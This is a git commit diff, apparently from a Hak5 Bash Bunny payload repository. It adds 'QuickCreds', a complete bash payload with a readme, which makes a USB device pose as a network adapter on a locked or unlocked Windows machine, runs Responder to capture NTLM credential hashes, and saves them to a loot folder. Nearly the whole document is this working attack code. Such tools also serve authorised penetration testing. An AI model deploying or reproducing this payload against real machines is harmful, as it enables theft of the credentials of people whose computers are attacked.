Cleanup: Sort payloads by category

2025-10-29 16:58:25 +00:00 · 2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions
--- a/payloads/library/credentials/QuickCreds/payload.txt
+++ b/payloads/library/credentials/QuickCreds/payload.txt
@@ -0,0 +1,80 @@
+#!/bin/bash
+#
+# Title:         Quick Creds
+# Author:        Hak5Darren -- Cred: Mubix
+# Version:       1.0
+# Firmware:      >= 1.1
+#
+# Runs responder against target with specified options
+# Saves sequential logs to mass storage loot folder
+#
+# Requires responder in /tools/responder
+#
+# | Status              | Description                              |
+# | ------------------- | ---------------------------------------- |
+# | FAIL1               | Responder not found at /tools/responder  |
+# | FAIL2               | Target did not aquire IP address         |
+# All other LED statuses are standard to v1.1
+# 
+# Options
+RESPONDER_OPTIONS="-w -r -d -P"
+LOOTDIR=/root/udisk/loot/quickcreds
+
+# Check for responder
+REQUIRETOOL responder
+
+# Setup Attack
+LED SETUP
+
+# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
+ATTACKMODE RNDIS_ETHERNET 
+#ATTACKMODE ECM_ETHERNET
+
+# Set convenience variables
+GET TARGET_HOSTNAME
+GET TARGET_IP
+
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+HOST=${TARGET_HOSTNAME}
+# If hostname is blank set it to "noname"
+[[ -z "$HOST" ]] && HOST="noname"
+COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
+COUNT=$((COUNT+1))
+mkdir -p $LOOTDIR/$HOST-$COUNT
+
+# As a backup also copy logs to a loot directory in /root/loot/
+mkdir -p /root/loot/quickcreds/$HOST-$COUNT
+
+# Check target IP address. If unset, blink RED and end.
+if [ -z "${TARGET_IP}" ]; then
+    LED FAIL2
+	exit 1
+fi
+
+# Set LED yellow, run attack
+LED ATTACK
+cd /tools/responder
+
+# Clean logs directory
+rm logs/*
+
+# Run Responder with specified options
+python Responder.py -I usb0 $RESPONDER_OPTIONS &
+
+# Wait until NTLM log is found
+until [ -f logs/*NTLM* ]
+do
+     # Ima just loop here until NTLM logs are found
+	 sleep 1
+done
+
+# copy logs to loot directory
+cp logs/* /root/loot/quickcreds/$HOST-$COUNT
+cp logs/* $LOOTDIR/$HOST-$COUNT
+
+# Sync USB disk filesystem
+sync
+
+# Light turns green - trap is clean.
+LED FINISH
--- a/payloads/library/credentials/QuickCreds/readme.md
+++ b/payloads/library/credentials/QuickCreds/readme.md
@@ -0,0 +1,34 @@
+# QuickCreds for Bash Bunnys
+
+Author: Hak5Darren
+Version: Version 1.0
+Credit: Mubix
+Firmware: >= 1.1
+
+## Description
+
+Snags credentials from locked or unlocked machines 
+Based on the attack by Mubix of Room362.com
+Implements a responder attack. Saves creds to the loot folder on the USB Disk
+Looks for *NTLM* log files
+
+## Configuration
+
+Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix
+
+## Requirements
+
+Responder must be in /tools/responder/
+
+## STATUS
+
+
+| Status              | Description                              |
+| ------------------- | ---------------------------------------- |
+| FAIL1               | Responder not found at /tools/responder  |
+| FAIL2               | Target did not aquire IP address         |
+
+All other LED statuses are standard to v1.1
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40226-payload-quickcreds/ "Hak5 Forum Thread")